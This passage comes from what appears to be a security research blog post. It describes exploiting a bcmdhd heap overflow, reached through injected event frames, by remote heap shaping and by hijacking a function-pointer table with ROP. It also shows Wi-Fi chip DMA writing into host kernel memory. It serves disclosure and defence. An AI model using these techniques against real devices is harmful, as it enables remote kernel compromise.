However… Since we already have code-execution on the Wi-Fi SoC, we can simply “revert” the patch. All it takes is for us to “patch out” the validation method in the firmware, thereby causing any received frame to once again be forwarded blindly to the host. This, in turn, allows us to inject arbitrary messages into the communication protocol between the host and the Wi-Fi chip. Moreover, since the validation method is stored in RAM, and all of RAM is marked as RWX, this is as simple as writing “MOV R0, #0; BX LR” to the function’s prologue.

The Attack Surface
As we mentioned earlier, the attack surface exposed by the internal communication channel is huge. Tracing the control flow from the entry point for handling event frames (dhd_wl_host_event), we can see that several events receive “special treatment”, and are processed independently (see wl_host_event and wl_show_host_event). Once the initial treatment is done, the frames are inserted into a queue. Events are then dequeued by a kernel thread whose sole purpose is to read events from the queue and dispatch them to their corresponding handler function. This correlation is done by using the event’s internal “event-type” field as an index into an array of handler functions, called evt_handler.

While there are up to 144 different supported event codes, the host driver for Android, bcmdhd, only supports a much smaller subset of these. Nonetheless, about 35 events are supported within the driver, each including their own elaborate handlers.
Now that we’re convinced that the attack surface is large enough, we can start hunting for bugs! Unfortunately, it seems like the Wi-Fi chip is considered as “trusted”; as a result, some of the validations in the host’s driver are insufficient… Indeed, auditing the relevant handler functions and auxiliary protocol handlers outlined above, we find a substantial number of vulnerabilities. The Vulnerability
Taking a closer look at the vulnerabilities we’ve found, we can see that they all differ from one another slightly. Some allow for relatively strong primitives, some weaker. However, most importantly, many of them have various preconditions which must be fulfilled to successfully trigger them; some are limited to certain physical interfaces, while others work only in certain configurations of the driver. Nonetheless, one vulnerability seems to be present in all versions of bcmdhd and in all configurations - if we can successfully exploit it, we should be set.
Let’s take a closer look at the event frame in question. Events of type "WLC_E_PFN_SWC" are used to indicate that a “Significant Wi-Fi Change” (SWC) has occurred within the firmware and must be handled by the host. Instead of directly handling these events, the host’s driver simply gathers all the transferred data from the firmware, and broadcasts a “vendor event” packet via Netlink to the cfg80211 layer.
More concretely, each SWC event frame transmitted by the firmware contains an array of events (of type wl_pfn_significant_net_t), a total count (total_count), and the number of events in the array (pkt_count). Since the total number of events can be quite large, it might not fit in a single frame (i.e., it might be larger than the the maximal MSDU). In this case, multiple SWC event frames can be sent consecutively - their internal data will be accumulated by the driver until the total count is reached, at which point the driver will process the entire list of events.
Reading through the driver’s code, we can see that when this event code is received, an initial handler is triggered in order to deal with the event. The handler then internally calls into the "dhd_handle_swc_evt" function in order to process the event's data. Let’s take a closer look:
1.  void* dhd_handle_swc_evt(dhd_pub_t *dhd,const void *event_data,int *send_evt_bytes)
2.  {
3.   ...
4.   wl_pfn_swc_results_t *results = (wl_pfn_swc_results_t *)event_data;
5.   ...
6.   gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);7.   params = &(gscan_params->param_significant);
8.   ...
9.   if (!params->results_rxed_so_far) {
10.      if (!params->change_array) {
11.          params->change_array = (wl_pfn_significant_net_t *)
12.                                  kmalloc(sizeof(wl_pfn_significant_net_t) *13.                                          results->total_count, GFP_KERNEL);
14.          ...
15.      }
16.  }
17.  ...
18.  change_array = &params->change_array[params->results_rxed_so_far];
19.  memcpy(change_array,20.         results->list,21.         sizeof(wl_pfn_significant_net_t) * results->pkt_count);
22.  params->results_rxed_so_far += results->pkt_count;
23.  ...
24. }
(where "event_data" is the arbitrary data encapsulated in the event passed in from the firmware)
As we can see above, the function first allocates an array to hold the total count of events (if one hasn’t been allocated before) and then proceeds to concatenate the encapsulated data starting from the appropriate index (results_rxed_so_far) in the buffer.
However, the handler fails to verify the relation between the total_count and the pkt_count! It simply “trusts” the assertion that the total_count is sufficiently large to store all the subsequent events passed in. As a result, an attacker with the ability to inject arbitrary event frames can specify a small total_count and a larger pkt_count, thereby triggering a simple kernel heap overflow.Remote Kernel Heap Shaping
This is all well and good, but how can we leverage this primitive from a remote vantage point? As we’re not locally present on the device, we’re unable to gather any data about the current state of the heap, nor do we have address-space related information (unless, of course, we’re able to somehow leak this information). Many classic exploits targeting kernel heap overflows rely on the ability to shape the kernel’s heap, ensuring a certain state prior to triggering an overflow - an ability we also lack at the moment.
What do we know about the allocator itself? There are a few possible underlying implementations for the kmalloc allocator (SLAB, SLUB, SLOB), configurable when building the kernel. However, on the vast majority of devices, kmalloc uses “SLUB” - an unqueued “slab allocator” with per-CPU caches.
Each “slab” is simply a small region from which identically-sized allocations are carved. The first chunk in each slab contains its metadata (such as the slab’s freelist), and subsequent blocks contain the allocations themselves, with no inline metadata. There are a number of predefined slab size-classes which are used by kmalloc, typically spanning from as little as 64 bytes, to around 8KB. Unsurprisingly, the allocator uses the best-fitting slab (smallest slab that is large enough) for each allocation. Lastly, the slabs’ freelists are consumed linearly - consecutive allocations occupy consecutive memory addresses. However, if objects are freed within the slab, it may become fragmented - causing subsequent allocations to fill-in “holes” within the slab instead of proceeding linearly.With this in mind, let’s take a step back and analyse the primitives at hand. First, since we are able to arbitrarily specify any value in total_count, we can choose the overflown buffer’s size to be any multiple of sizeof(wl_pfn_significant_net). This means we can inhabit any slab cache size of our choosing. As such, there’s no limitation on the size of the objects we can target with the overflow. However, this is not quite enough… For starters, we still don’t know anything about the current state of the slabs themselves, nor can we trigger remote allocations in slabs of our choosing.
It seems that first and foremost, we need to find a way to remotely shape slabs. Recall, however, that there are a few obstacles we need to overcome. As SLUB maintains per-CPU caches, the affinity of the kernel thread in which the allocation is performed must be the same as the one from which the overflown buffer is allocated. Gaining a heap shaping primitive on a different CPU core will cause the allocations to be taken from different slabs. The most straightforward way to tackle this issue is to confine ourselves to heap shaping primitives which can be triggered from the same kernel thread on which the overflow occurs. This is quite a substantial constraint… In essence, it forces us to disregard allocations that occur as a result of processes that are external to the event handling itself.
Regardless, with a concrete goal in mind, we can start looking for heap shaping primitives in the registered handlers for each of the event frames. As luck would have it, after going through every handler, we come across a (single) perfect fit!
Events frames of type “WLC_E_PFN_BSSID_NET_FOUND” are handled by the handler function dhd_handle_hotlist_scan_evt. This function accumulates a linked list of scan results. Every time an event is received, its data is appended to the list. Finally, when an event arrives with a flag indicating it is the last event in the chain, the function passes on the collected list of events to be processed. Let’s take a closer look:
1. void *dhd_handle_hotlist_scan_evt(dhd_pub_t *dhd, const void *event_data,2.                                   int *send_evt_bytes, hotlist_type_t type)3. {4.    struct dhd_pno_gscan_params *gscan_params;5.    wl_pfn_scanresults_t *results = (wl_pfn_scanresults_t *)event_data;6.    gscan_params = &(_pno_state->pno_params_arr[INDEX_OF_GSCAN_PARAMS].params_gscan);7.    ...8.    malloc_size = sizeof(gscan_results_cache_t) +9.                      ((results->count - 1) * sizeof(wifi_gscan_result_t));10.   gscan_hotlist_cache = (gscan_results_cache_t *) kmalloc(malloc_size, GFP_KERNEL);11.   ...12.   gscan_hotlist_cache->next = gscan_params->gscan_hotlist_found;13.   gscan_params->gscan_hotlist_found = gscan_hotlist_cache;14.   ...15.   gscan_hotlist_cache->tot_count = results->count;16.   gscan_hotlist_cache->tot_consumed = 0;17.   plnetinfo = results->netinfo;18.   for (i = 0; i < results->count; i++, plnetinfo++) {19      hotlist_found_array = &gscan_hotlist_cache->results[i];20.     ... //Populate the entry with the sanitised network information21.   }22.  if (results->status == PFN_COMPLETE) {23.    ... //Process the entire chain24.  }25.  ...26.}
Awesome - looking at the function above, it seems that we’re able to repeatedly cause allocations of size { sizeof(gscan_results_cache_t) + (N-1) * sizeof(wifi_gscan_result_t) | N > 0 } (where N denotes results->count). What’s more, these allocations are performed in the same kernel thread, and their lifetime is completely controlled by us! As long as we don’t send an event with the PFN_COMPLETE status, none of the allocations will be freed.
Before we move on, we’ll need to choose a target slab size. Ideally, we’re looking for a slab that’s relatively inactive. If other threads on the same CPU choose to allocate (or free) data from the same slab, this would add uncertainty to the slab’s state and may prevent us from successfully shaping it. After looking at /proc/slabinfo and tracing kmalloc allocations for every slab with the same affinity as our target kernel thread, it seems that the kmalloc-1024 slab is mostly inactive. As such, we’ll choose to target this slab size in our exploit.
By using the heap shaping primitive above we can start filling slabs of any given size with  “gscan” objects. Each “gscan” object has a short header containing some metadata relating to the scan and a pointer to the next element in the linked list. The rest of the object is then populated by an inline array of “scan results”, carrying the actual data for this node.
Going back to the issue at hand - how can we use this primitive to craft a predictable layout?
Well, by combining the heap shaping primitive with the overflow primitive, we should be able to properly shape slabs of any size-class prior to triggering the overflow. Recall the initially any given slab may be fragmented, like so:However, after triggering enough allocations (e.g. (SLAB_TOTAL_SIZE / SLAB_OBJECT_SIZE) - 1) with our heap shaping primitive, all the holes (if present) in the current slab should get populated, causing subsequent allocations of the same size-class to be placed consecutively.
Now, we can send a single crafted SWC event frame, indicating a total_count resulting in an allocation from the same target slab. However, we don’t want to trigger the overflow yet! We still have to shape the current slab before we do so. To prevent the overflow from occurring, we’ll provide a small pkt_count, thereby only partially filling in the buffer.
Finally, using the heap shaping primitive once again, we can fill the rest of the slab with more of our “gscan” objects, bringing us to the following heap state:

Okay… We’re getting there! As we can see above, if we choose to use the overflow primitive at this point, we could overwrite the contents of one of the “gscan” objects with our own arbitrary data. However, we’ve yet to determine exactly what kind of result that would yield…Analysing The Constraints
In order to determine the effect of overwriting a “gscan” object, let’s take a closer look at the flow that processes a chain of “gscan” objects (that is, the operations performed after an event with a “completion” flag is received). This processing is handled by wl_cfgvendor_send_hotlist_event. The function goes over each of the events in the list, packs the event’s data into an SKB, and subsequently broadcasts the SKB over Netlink to any potential listeners.
However, the function does have a certain obstacle it needs to overcome; any given “gscan” node may be larger than the maximal size of an SKB. Therefore, the node would need to be split into several SKBs. To keep track of this information, the “tot_count” and “tot_consumed” fields in the “gscan” structure are utilised. The “tot_count” field indicates the total number of embedded scan result entries in the node’s inline array, and the “tot_consumed” field indicates the number of entries consumed (transmitted) so far.
As a result, the function slightly modifies the contents of the list while processing it. Essentially, it enforces the invariant that each processed node’s “total_consumed” field will be modified to match its “tot_count” field. As for the data being transmitted and how it’s packed, we’ll skip those details for brevity’s sake. However, it’s important to note that other than the aforementioned side effect, the function above appears to be quite harmless (that is, no further primitives can be “mined” from it). Lastly, after all the events are packed into SKBs and transmitted to any listeners, they can finally be reclaimed. This is achieved by simply walking over the list, and calling “kfree” on each entry.
Putting it all together, where does this leave us with regards to exploitation? Assuming we choose to overwrite one of the “gscan” entries using the overflow primitive, we can modify its “next” field (or rather, must, as it is the first field in the structure) and point it at any arbitrary address. This would cause the processing function to use this arbitrary pointer as if it were an element in the list.
Due to the invariant of the processing function - after processing the crafted entry, its 7th byte (“tot_consumed”) will be modified to match its 6th byte (“tot_count”). In addition, the pointer will then be kfree-d after processing the chain. What’s more, recall that the processing function iterates over the entire list of entries. This means that the first four bytes in the crafted entry (its “next” field) must either point to another memory location containing a “valid” list node (which must then satisfy the same constraints), or must otherwise hold the value 0 (NULL), indicating that this is the last element in the list.
This doesn’t look easy… There’s quite a large number of constraints we need to consider. If we willfully choose the ignore the kfree for a moment, we could try and search for memory locations where the first four bytes are zero, and where it would be beneficial to modify the 7th byte to match the 6th. Of course, this is just the tip of the iceberg; we could repeatedly trigger the same primitive in order to repeatedly copy bytes one position to the left. Perhaps, if we were able to locate a memory address where enough zero bytes and enough bytes of our choosing are present, we could craft a target value by consecutively using these two primitives.
In order to gage the feasibility of this approach, I’ve encoded the constraints above in a small SMT instance (using Z3), and supplied the actual heap data from the kernel, along with various target values and their corresponding locations. Additionally, since the kernel’s translation table is stored at a constant address in the kernel’s VAS and even slight modifications to it can result in exploitable conditions, its contents (along with corresponding target values) was added to the SMT instance as well. The instance was constructed to be satisfiable if and only if any of the target values could occupy any of the target locations within no more than ten “steps” (where each step is an invocation of the primitive). Unfortunately, the results were quite grim… It seemed like this approach just wasn’t powerful enough.
Moreover, while this idea might be nice in theory, it doesn’t quite work in practice. You see, calling kfree on an arbitrary address is not without side-effects of its own. For starters, the page containing the memory address must be marked as either a “slab” page, or as “compound”. This only holds true (in general) for pages actually used by the slab allocator. Trying to call kfree on an address in a page that isn’t marked as such, triggers a kernel panic (thereby crashing the device).
Perhaps, instead, we can choose to ignore the other constraints and focus on the kfree? Indeed, if we are able to consistently locate an allocation whose data can be used for the purpose of the exploit, we could attempt to free that memory address, and then “re-capture” it by using our heap shaping primitive. However, this raises several additional questions. First, will we be able to consistently locate a slab-resident address? Second, even if we were to find such an address, surely it will be associated with a per-CPU cache, meaning that freeing it will not necessarily allow us to reclaim it later on. Lastly, whichever allocation we do choose to target, will have to satisfy the constraints above - that is, the first four bytes must be zero, and the 7th byte will be modified to match the 6th.
However, this is where some slight trickery comes in handy! Recall that kmalloc holds a number of fixed-size caches. Yet what should happen when a larger allocation is requested? In turn out that in that case, kmalloc simply returns a number of consecutive free pages (using __get_free_pages) and returns them to the caller. This is done without any per-CPU caching. As such, if we are able to free a large allocation, we should then be able to reclaim it without having to consider which CPU allocated it in the first place.
This may solve the problem of affinity, but it still doesn’t help us locate these allocations. Unfortunately, the slab caches are allocated quite late in the kernel’s boot process, and their contents are very “noisy”. This means that even guessing a single address within a slab is quite difficult, even more so for remote attackers. However, early allocations which use the large allocation flow (that is, which are created using __get_free_pages) do consistently inhabit the same memory addresses! This is as long as they occur early enough during the kernel’s initialisation so that no non-deterministic events happen concurrently.
Combining these two facts, we can search for a large early allocation. After tracing the large allocation path and rebooting the kernel, it seems that there are indeed quite a few such allocations. To help navigate this large trace, we can also compile the Linux kernel with a special GCC plugin that outputs the size of each structure used in the kernel. Using these two traces, we can quickly navigate the early large allocations, and try and search for a potential match.
After going over the list, we come across one seemingly interesting entry:

Putting It All Together
During the bcmdhd driver’s initialisation, it calls the wiphy_new function in order to allocate an instance of wl_priv. This instance is used to hold much of the metadata related to the driver’s operation. But there’s one more sneaky little piece of data hiding within this structure - the event handler function pointer array used to handle incoming event frames! Indeed, the very same table we were discussing earlier on (evt_handler), is stored within this object. This leads us to a direct path for exploitation - simply kfree this object, then send an SWC event frame to reclaim it, and fill it with our own arbitrary data.
Before we can do so, however, we’ll need to make sure that the object satisfies the constraints mandated by the processing function. Namely, the first four bytes must be zero, and we must be able to modify the 7th byte to match the value of the 6th byte. While the second constraint poses no issue at all, the first constraint turns out to be quite problematic! As it happens, the first four bytes are not zero, but in fact point to a block of function pointers related to the driver. Does this mean we can’t use this object after all?
No - as luck would have it, we can still use one more trick! It turns out that when kfree-ing a large allocation, the code path for kfree doesn’t require the passed in pointer to point to the beginning of the allocation. Instead, it simply fetches the pages corresponding to the allocation, and frees them instead. This means that by specifying an address located within the structure that does match the constraints, we’ll be able to both satisfy the requirements imposed by the processing function and free the underlying object. Great.
Putting this all together, we can now simply send along a SWC event frame in order to reclaim the evt_handler function pointer array, and populate it with our own contents. As there is no KASLR, we can search for a stack pivot gadget in the kernel image that will allow us to gain code execution. For the purpose of the exploit, I’ve chosen to replace the event handler for WLC_E_SET_SSID with a stack pivot into the event frame itself (which is stored in R2 when the event handler is executed). Lastly, by placing a ROP stack in a crafted event frame of type WLC_E_SET_SSID, we can now gain control over the kernel thread’s execution, thus completing our exploit.

You can find a sample exploit for this vulnerability here. It includes a short ROP chain that simply calls printk. The exploit was built against a Nexus 5 with a custom kernel version. In order to modify it to work against different kernel versions, you’ll need to fill in the appropriate symbols (under symbols.py). Moreover, while the primitives are still present in 64-bit devices, there might be additional work required in order to adjust the exploit for those platforms.
With that, let’s move on to the second part of the blog post!Part 2 - The “Easy” WayHow Low Can You Go?
Although we’ve seen that the high-level communication protocols between the Wi-Fi firmware and the host may be compromised, we’ve also seen how tedious it might be to write a fully-functional exploit. Indeed, the exploit detailed above required sufficient information about the device being targeted (such as symbols). Furthermore, any mistake during the exploitation might cause the kernel to crash; thereby rebooting the device and requiring us to start all over again. This fact, coupled with our transient control over the Wi-Fi SoC, makes these types of exploit chains harder to exploit reliably.
That said, up until now we’ve only considered the high-level attack surface exposed to the firmware. In effect, we were thinking of the Wi-Fi SoC and the application processor as two distinct entities which are completely isolated from one another. In reality, we know that nothing can be further from the truth. Not only are the Wi-Fi SoC and the host physically proximate to one another, they also share a physical communication interface.
As we’ve seen before, Broadcom manufactures SoCs that support various interfaces, including SDIO, USB and even PCIe. While the SDIO interface used to be quite popular, in recent years it has fallen out of favour in mobile devices. The main reason for the “disappearance” of SDIO is due to its limited transfer speeds. As an example, Broadcom’s BCM4339 SoC supports SDIO 3.0, a fairly advanced version of SDIO. Nonetheless, it is still limited to a theoretical maximal bus speed of 104 MB/s. On the other hand, 802.11ac has a theoretical maximal speed of 166 MB/s - much more than SDIO can cope with.                                                 BCM4339 Block Diagram
The increased transfer rates caused PCIe to become the most prevalent interface used to connect Wi-Fi SoCs in modern mobile devices. PCIe, unlike PCI, is based on a point-to-point topology. Every device has it’s own serial link connecting it to the host. Due to this design, PCIe enjoys much higher transfer rates per lane than the equivalent rates on PCI (since bus access doesn’t need to be arbitrated); PCIe 1.0 has a throughput of 250 MB/s on a single lane (scaling linearly with the number of lanes).
More concretely, let’s take a look at the adoption rate of PCIe in modern mobile devices. Taking Nexus phones as a case study, it seems that since the Nexus 6, all devices use a PCIe interface instead of SDIO. Much in the same way, all iPhones since the iPhone 6 use PCIe (whereas old iPhones used USB to connect to the Wi-Fi SoC). Lastly, all Samsung flagships since the Galaxy S6 use PCIe.Interface Isolation
So why is this information relevant to our pursuits? Well, PCIe is significantly different to SDIO and USB in terms of isolation. Without going into the internals of each of the interfaces, SDIO simply allows the serial transfer of small command “packets” (on the CMD pin), potentially accompanied by data (on the DATA pins). The SDIO controller then decodes the command and responds appropriately. While SDIO may support DMA (for example, the host can set up a DMA engine to continually read data from the SD bus and transfer it to memory), this feature is not used on mobile devices, and is not an inherent part of SDIO. Furthermore, the low-level SDIO communication on the BCM SoC is handled by the “SDIOD” core. In order to craft special SDIO commands, we would most likely need to gain access to this controller first.
Likewise, USB (up to version 3.1) does not include support for DMA. The USB protocol is handled by the host’s USB controller, which performs the necessary memory access required. Of course, it might be possible to compromise the USB controller itself, and use its interface to the memory system in order to gain memory access. For example, on the Intel Hub Architecture, the USB controller connects to the PCH via PCI, which is capable of DMA. But once again, this kind of attack is rather complex, and is limited to specific architectures and USB controllers.
In contrast to these two interfaces, PCIe allows for DMA by design. This allows PCIe to operate at great speeds without incurring a performance hit on the host. Once data is transferred to the host’s memory, an interrupt is fired to indicate that work needs to be done.
On the transaction layer, PCIe operates by sending small bundles of data, appropriately named “Transaction Layer Packets” (TLPs). Each TLP may be routed by a network of switches, until it reaches the destined peripheral. There, the peripheral decodes the packet and performs the requested memory operation. The TLP’s header encodes whether this is a requested read or write operation, and its body contains any accompanying data related to the request.
                       Structure of a Transaction Layer Packet (TLP)IOU an MMU
While PCIe enables DMA by design, that still doesn’t imply that any PCIe connected peripheral should be able to freely access any memory address on the host. Indeed, modern architectures defend themselves against DMA-capable peripherals by including additional memory mapping units (IOMMUs) on the IO buses connecting the peripherals to main memory.
ARM specifies its own version of an IOMMU, called the “System Memory Mapping Unit” (SMMU). Among other roles, the SMMU is used in order to manage the memory view exposed to different SoC components. In short, each stream of memory transactions is associated with a “Stream ID”. The SMMU then performs a step called “context determination” in order to translate the Stream ID to the corresponding memory context.
Using the memory context, the SMMU is then able to associate the memory operations with the the translation table containing the mappings for the requesting device. Much like a regular ARM MMU, the translation tables are queried in order to translate the input address (either a virtual address or an intermediate physical address) to the corresponding physical address. Of course, along the way the SMMU also ensures that the requested memory operation is, in fact, allowed. If any of these steps fails, a fault is generated.

While this is all well and good in theory, it still doesn’t mean that an SMMU is, in fact, used in practice. Unfortunately, mobile SoCs are proprietary, so it would be hard to determine how and where SMMUs are actually in place. That said, we can still glean some insight from publically available information. For example, by going over the IOMMU bindings in the Linux Kernel, we can see that apparently both Qualcomm and Samsung have their own proprietary implementations of an SMMU (!), with it’s own unique device-tree bindings. However, suspiciously, it seems that the device tree entries for the Broadcom Wi-Fi chip are missing these IOMMU bindings…
Perhaps, instead, Broadcom’s host driver (bcmdhd) manually configures the SMMUs before each peripheral memory access? In order to answer this question, we’ll need to take a closer look at the driver’s implementation of the communication protocol used over PCIe. Broadcom implements their own proprietary protocol called “MSGBUF” in order to communicate with the Wi-Fi chip over PCIe. The host’s implementation of the protocol and the code for handling PCIe can be found under dhd_msgbuf.c and dhd_pcie.c, respectively.
After going through the code, we gain a few key insights into the communication protocol’s inner workings. First, as expected, the driver scans the PCIe interface, accesses the PCI configuration space, and maps all the shared resources into the host’s memory. Next, the host allocates a set of “rings”. Each ring is backed by a DMA-coherent memory region. The MSGBUF protocol uses four rings for data flow, and one ring for control. Each data path (either RX or TX), has two corresponding rings - one to signal the submission of a request, and another to indicate its completion. Yet, there still doesn’t seem to be any reference to an SMMU in the driver so far. Perhaps we have to dig deeper...
So how does the Wi-Fi chip learn about the location of these rings? After all, so far they’re just a bunch of physically contiguous buffers allocated in the driver. Going over the driver’s code, it appears that the host and the chip hold a shared structure, pciedev_shared_t, containing all the PCIe-related metadata, including the location of each of the ring buffers. The host holds its own copy of this structure, but where does the Wi-Fi SoC keep its copy? According to the dhdpcie_readshared function, it appears that the Wi-Fi chip stores a pointer to this structure in the last four bytes of its RAM.

Let’s go ahead and take a look at the structure’s contents. To make this process slightly easier, I’ve written a small script that takes a firmware RAM snapshot (produced using dhdutil), reads the pointer to the PCIe shared structure from the end of RAM, and dumps out the relevant information:

Following the rings_info_ptr field, we can also dump the information about each of the rings - including their size, current index, and physical memory address:


For starters, we can see that the memory addresses specified in these buffers seem to be, in fact, physical memory addresses from the host’s memory. This is slightly suspicious… In the presence of an SMMU, the chip could have used an entirely different address range (which would have then been translated by the SMMU into a physical addresses). However, merely being suspicious is not enough... To check whether or not the an SMMU is present (or active), we’ll need to set up a small experiment!
Recall that the MSGBUF protocol uses the aforementioned ring buffers to indicate submission and completion of events, for both the RX and the TX paths. In essence, during transmission of a frame, the host writes to the TX submission ring. Once the chip transmits the frame, it writes to the TX completion ring to indicate as such. Similarly, when a frame is received, the firmware writes to the RX submission ring, and the host subsequently writes to the RX completion ring upon reception of the frame.
If so, what if we were to modify the ring address corresponding to TX completion ring in the firmware’s PCIe metadata structure, and point it at an arbitrary memory address? If an SMMU is in place and the chosen memory address is not mapped-in for the Wi-Fi chip, the SMMU will generate a fault and no modification will take place. However, if there is no SMMU in place, we should be able to observe this modification by simple dumping the corresponding physical memory range from the host (for example, by using /dev/mem). This small experiment also allows us to avoid reverse-engineering the Wi-Fi firmware’s implementation of the MSGBUF protocol for the time being, which would no doubt be quite tedious.
To make things more interesting, let’s modify the TX completion ring’s address to point at the beginning of the Linux Kernel’s code segment (0x80000 on the Nexus 6P : see /proc/iomem). After generating some Wi-Fi traffic and inspecting the contents of physical memory, we are presented with the following result:


Aha! The Wi-Fi chip managed to DMA into the physical address range containing the host’s kernel, without any interference! This finally confirms our suspicion; either there is no SMMU present, or it isn’t configured to prevent the chip from accessing the host’s RAM.
Not only does this kind of access not require a single vulnerability, but it is also much more reliable to exploit. There’s no need for the exact kernel symbols, or any other preliminary information. The Wi-Fi SoC can simply use its DMA access to scan the physical address ranges in order to locate the kernel. Then, it can identify the kernel’s symbol table in RAM, analyse it to locate the any kernel function it wishes, and proceed to hijack the function by overwriting its code (one such example can be seen in this similar DMA-like attack). All in all, this style of attack is completely portable and 100% reliable -- a significant step-up from the previous exploit we saw.
Although we could stop here, let’s make one additional small effort in order to get slightly better control over this primitive. While we are able to DMA into the host’s memory, we are doing so rather “blindly” at this point. We do not control the data being written, but instead rely on the Wi-Fi firmware’s implementation of the MSGBUF protocol to corrupt the host’s memory. By delving slightly further, we should be able to figure out how the DMA engine on the Wi-Fi chip works, and manually utilise it to access the host’s memory (instead of relying on side-effects, as shown above).
So where do we start? Searching for the “MSGBUF” string, we can see some initialisation routines related to the protocol, which are part of the special “reclaim” region (and are therefore only used during the chip’s initialisation). Nevertheless, reverse-engineering these functions reveals that they reference a set of functions in the Wi-Fi chip’s RAM. Luckily, some of these functions’ names are present in the ROM! Their names seem quite relevant: “dma64_txfast”, “dma64_txreset” - it seems like we’re on the right track.
Once again, we are spared some reverse-engineering effort. Broadcom’s SoftMAC driver, brcmsmac, contains the implementation for these exact functions. Although we can expect some differences, the general idea should remain the same.
Combing through the code, it appears that for every DMA-capable source or sink, there exists a corresponding DMA metadata structure, called “dma_info”. This structure contains pointers to the DMA RX and TX registers, as well as the DMA descriptor rings into which the DMA source or destination addresses are inserted. Additionally, each structure is assigned an 8-byte name which can be used to identify it. What’s more, every dma_info structure begins with a pointer to the RAM function block containing the DMA functions - the same block we identified earlier. Therefore, we can locate all instances of these DMA metadata structures by simply searching for this pointer in the Wi-Fi SoC’s RAM.
Now that we know the format of these metadata structures and have a means to locate them, we can try and search for the instance corresponding to the DMA TX path from the Wi-Fi chip to the host.
Unfortunately, this is easier said than done. After all, we can expect to find multiple instances of these structures, as the Wi-Fi chip performs DMA to and from many sources and sinks. For example, the firmware likely uses SoC-internal DMA engines to perform access the internal RX and TX FIFOs. So how can we identify the correct DMA descriptor?
Recall that each descriptor has an associated “name” field. Let’s search for all the DMA descriptors in RAM (by searching for the DMA function block pointer), and output the corresponding name for each instance:
Found dma_info - Address: 0x00220288, Name: "wl0"Found dma_info - Address: 0x00220478, Name: "wl0"Found dma_info - Address: 0x00220A78, Name: "wl0"Found dma_info - Address: 0x00221078, Name: "wl0"Found dma_info - Address: 0x00221BF8, Name: "wl0"Found dma_info - Address: 0x0022360C, Name: "wl0"Found dma_info - Address: 0x00236268, Name: "D2H"Found dma_info - Address: 0x00238B7C, Name: "H2D"
Great! While there are a few nondescript dma_info instances which are probably used internally (as suspected), there are also two instances which seem to correspond to host-to-device (H2D) and device-to-host (D2H) DMA accesses. Since we’re interested in DMA-ing into the host’s memory, let’s take a closer look at the D2H structure:

Note that the RX and TX registers point to an area outside the Wi-Fi firmware’s ROM and RAM. In fact, they point to backplane addresses corresponding to the DMA engine’s registers. In contrast, the RX and TX descriptor ring pointers do, indeed, point to memory locations within the SoC’s RAM.
By going over the DMA code in brcmsmac and the MSGBUF protocol implementation in the host’s driver, we are able to finally piece together the details. First, the host posts physical addresses (corresponding to SKBs) to the chip, using the MSGBUF protocol. These addresses are then inserted into the DMA descriptor rings by the firmware’s MSGBUF implementation. Once the rings are populated, the Wi-Fi chip simply writes to the backplane registers in order to “kick off” the DMA engine. The DMA engine will then go over the descriptor list, and consume the descriptor at the current ring index for the DMA access. Once a DMA descriptor is consumed, its value is set to a special “magic” value (0xDEADBEEF).
Therefore, all we need to do in order to manipulate the DMA engine into writing into our own arbitrary physical address is to modify the DMA descriptor ring. Since the MSGBUF protocol is constantly operating as frames are being sent back and forth, the descriptor rings change rapidly. It would be useful if we could “hook” one of the functions called during the DMA TX flow, allowing us to quickly replace the current descriptors with our own crafted values.
As luck would have it, while the dmx64_txfast function is located in ROM, its prologue starts with a branch into RAM. This allows us to use our patcher from the previous blog post in order to hook the function, and execute our own shellcode stub. Let’s write a small stub that simply goes over the D2H DMA descriptors, and changes every non-consumed descriptor to our own pointer. By doing so, subsequent calls to the DMA engine should write the received frame’s contents into the aforementioned address. After applying the patch and generating Wi-Fi traffic, we are greeted with the following result:

Ah-ha! We managed to DMA arbitrary data into an address of our choosing. Using this primitive, we can finally hijack any kernel function with our own crafted data.
Lastly - the experiment described above was performed on a Nexus 6P, which is based on Qualcomm’s Snapdragon 810 SoC. This raises the question: perhaps different SoCs exhibit different behaviour? To test out this theory, let’s repeat the same experiment on a Galaxy S7 Edge, which is based on Samsung’s Exynos 8890 SoC.
Using a previously disclosed privilege escalation to inject code into system_server, we can directly issue the ioctls required to interact with the bcmdhd driver, thus replacing the chip memory access capabilities provided by dhdutil in the above experiment. Similarly, using a previously disclosed kernel exploit, we are able to execute code within the kernel, allowing us to observe changes to the kernel’s code segments.
Putting this together, we can extract the Wi-Fi chip’s (BCM43596) ROM, inspect it, and locate the DMA function as described above. Then, we can insert the same hook; pointing any non-consumed DMA RX descriptors at the kernel code’s physical address. After installing the hook and generating some Wi-Fi traffic, we observe the following result:

Once again we are able to DMA freely into the kernel (bypassing RKP’s protection along the way)! It seems that both Samsung’s Exynos 8890 SoC and Qualcomm’s Snapdragon 810 either lack SMMUs or fail to utilise them.Afterword
In conclusion, we’ve seen that the the isolation between the host and the Wi-Fi SoC can, and should, be improved. While flaws exist in the communication protocols between the host and the chip, these can eventually be solved over time. However, the current lack of protection against a rogue Wi-Fi chip leaves much to be desired.
Since mobile SoCs are proprietary, it remains unknown whether current-gen SoCs are capable of facilitating such isolation. We hope that SoCs that do, indeed, have the capability to enable memory protection (for example, by means of an SMMU), choose to do so soon. For the SoCs that are incapable of doing so, perhaps this research will serve as a motivator when designing next-gen hardware.
The current lack of isolation can also have some surprising side effects. For example, Android contexts which are able to interact with the Wi-Fi firmware, can leverage the Wi-Fi SoC’s DMA capability in order to directly hijack the kernel. Therefore, these contexts should be thought of being “as privileged as the kernel”, an assumption which I believe is not currently made by Android’s security architecture.  
The combination of an increasingly complex firmware and Wi-Fi’s incessant onwards march, hint that firmware bugs will probably be around for quite some time. This hypothesis is supported by the fact that even a relatively shallow inspection of the firmware revealed a number of bugs, all of which were exploitable by remote attackers.
While memory isolation on its own will help defend against a rogue Wi-Fi SoC, the firmware’s defenses can also be bolstered against attacks. Currently, the firmware lacks exploit mitigations (such as stack cookies), and doesn’t make full use of the existing security mechanisms (such as the MPU). Hopefully, future versions are able to better defend against such attacks by implementing modern exploit mitigations and utilising SoC security mechanisms.
Categories: Security

Notes on Windows Uniscribe Fuzzing

Mon, 04/10/2017 - 10:25
Posted by Mateusz Jurczyk of Google Project Zero
